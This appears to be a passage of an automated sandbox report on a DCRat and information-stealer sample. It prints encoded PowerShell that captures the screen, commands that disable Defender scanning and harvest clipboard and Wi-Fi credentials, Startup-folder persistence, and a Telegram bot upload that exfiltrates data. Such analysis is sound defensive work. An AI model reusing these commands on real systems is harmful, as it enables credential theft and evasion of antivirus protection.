AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 3288, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7740, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 3288, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ProcessId: 6220, ProcessName: cmd.exe
    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 3288, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\QIjBj1l8We.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 3288, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 4320, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe" , ProcessId: 6732, ProcessName: wscript.exe
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8068, TargetFilename: C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', ProcessId: 7264, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

    Stealing of Sensitive Information

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 3288, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7796, ProcessName: cmd.exe
    Timestamp:06/21/24-04:29:08.213871
    SID:2850862
    Source Port:80
    Destination Port:54438
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: QIjBj1l8We.exeAvira: detected
    Source: https://raw.githubusercontent.com/quivings/Solara/main/Files/Solara.Dir.zipAvira URL Cloud: Label: malware
    Source: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
    Source: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
    Source: C:\Recovery\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
    Source: C:\Users\user\AppData\Local\Temp\Built.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
    Source: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeAvira: detection malicious, Label: TR/ATRAPS.Gen2
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAvira: detection malicious, Label: VBS/Runner.VPG
    Source: C:\Program Files\Windows Mail\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
    Source: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exeReversingLabs: Detection: 87%
    Source: C:\Program Files\Windows Mail\StartMenuExperienceHost.exeReversingLabs: Detection: 87%
    Source: C:\Recovery\fontdrvhost.exeReversingLabs: Detection: 87%
    Source: C:\Recovery\seCeUYjhGIFplo.exeReversingLabs: Detection: 87%
    Source: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exeReversingLabs: Detection: 87%
    Source: C:\Users\user\AppData\Local\Temp\Built.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeReversingLabs: Detection: 95%
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeReversingLabs: Detection: 71%
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeReversingLabs: Detection: 20%
    Source: QIjBj1l8We.exeVirustotal: Detection: 86%Perma Link
    Source: QIjBj1l8We.exeReversingLabs: Detection: 92%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exeJoe Sandbox ML: detected
    Source: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exeJoe Sandbox ML: detected
    Source: C:\Recovery\fontdrvhost.exeJoe Sandbox ML: detected
    Source: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJoe Sandbox ML: detected
    Source: C:\Program Files\Windows Mail\StartMenuExperienceHost.exeJoe Sandbox ML: detected
    Source: QIjBj1l8We.exeJoe Sandbox ML: detected
    Source: libcurl.dll.14.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_9d262530-b
    Source: QIjBj1l8We.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\669269bdeab909
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Windows Mail\StartMenuExperienceHost.exe
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Windows Mail\55b276f4edf653
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:54417 version: TLS 1.2
    Source: Binary string: C:\src\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: libcurl.dll.14.dr
    Source: Binary string: W.PDB/ source: x12.exe.0.dr
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\

    Networking

    barindex
    Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 5.101.152.137:80 -> 192.168.2.4:54438
    Source: unknownDNS query: name: api.telegram.org
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Files/Solara.Dir.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/patched.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: ip-api.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Files/Solara.Dir.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.com
    Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/patched.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: ip-api.com
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /bot6463842780:AAFaYRMI8L5vU1x4kT-GXUhqbxhmWpQtN6k/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 529394User-Agent: python-urllib3/2.2.1Content-Type: multipart/form-data; boundary=78f436dcf974873115ff8923a50ab021
    Source: README.md48.14.drString found in binary or memory: http://c9.io).
    Source: select.pyd.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: select.pyd.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: select.pyd.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: select.pyd.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: select.pyd.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: select.pyd.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: select.pyd.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: select.pyd.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: select.pyd.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: README.md48.14.drString found in binary or memory: http://encoding.spec.whatwg.org/).
    Source: README.md48.14.drString found in binary or memory: http://github.com/
    Source: README.md48.14.drString found in binary or memory: http://gruntjs.com/)
    Source: select.pyd.13.drString found in binary or memory: http://ocsp.digicert.com0
    Source: select.pyd.13.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: select.pyd.13.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: select.pyd.13.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: select.pyd.13.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: README.md48.14.drString found in binary or memory: http://www.nodemailer.com/)
    Source: README.md48.14.drString found in binary or memory: http://www.unicode.org/Public/MAPPINGS/)
    Source: README.md48.14.drString found in binary or memory: http://yeoman.io/)
    Source: README.md38.14.drString found in binary or memory: https://app.codecov.io/gh/inspect-js/has-proto/
    Source: README.md16.14.drString found in binary or memory: https://app.codecov.io/gh/ljharb/es-errors/
    Source: README.md38.14.drString found in binary or memory: https://codecov.io/gh/inspect-js/has-proto/branch/main/graphs/badge.svg
    Source: README.md16.14.drString found in binary or memory: https://codecov.io/gh/ljharb/es-errors/branch/main/graphs/badge.svg
    Source: libcurl.dll.14.drString found in binary or memory: https://curl.se/V
    Source: libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
    Source: libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/hsts.html
    Source: libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: README.md38.14.drString found in binary or memory: https://david-dm.org/inspect-js/has-proto
    Source: README.md38.14.drString found in binary or memory: https://david-dm.org/inspect-js/has-proto#info=devDependencies
    Source: README.md38.14.drString found in binary or memory: https://david-dm.org/inspect-js/has-proto.svg
    Source: README.md38.14.drString found in binary or memory: https://david-dm.org/inspect-js/has-proto/dev-status.svg
    Source: README.md16.14.drString found in binary or memory: https://david-dm.org/ljharb/es-errors
    Source: README.md16.14.drString found in binary or memory: https://david-dm.org/ljharb/es-errors#info=devDependencies
    Source: README.md16.14.drString found in binary or memory: https://david-dm.org/ljharb/es-errors.svg
    Source: README.md16.14.drString found in binary or memory: https://david-dm.org/ljharb/es-errors/dev-status.svg
    Source: node.js0.14.drString found in binary or memory: https://git.io/debug_fd)
    Source: mysql.js0.14.dr, cpp.js0.14.dr, vb.js0.14.dr, pgsql.js0.14.dr, r.js0.14.drString found in binary or memory: https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md
    Source: loader.js.14.dr, editor.main.nls.zh-cn.js0.14.drString found in binary or memory: https://github.com/Microsoft/vscode/blob/master/LICENSE.txt
    Source: README.md48.14.drString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/blob/master/lib/index.d.ts)
    Source: README.md48.14.drString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Node-v4-compatibility).
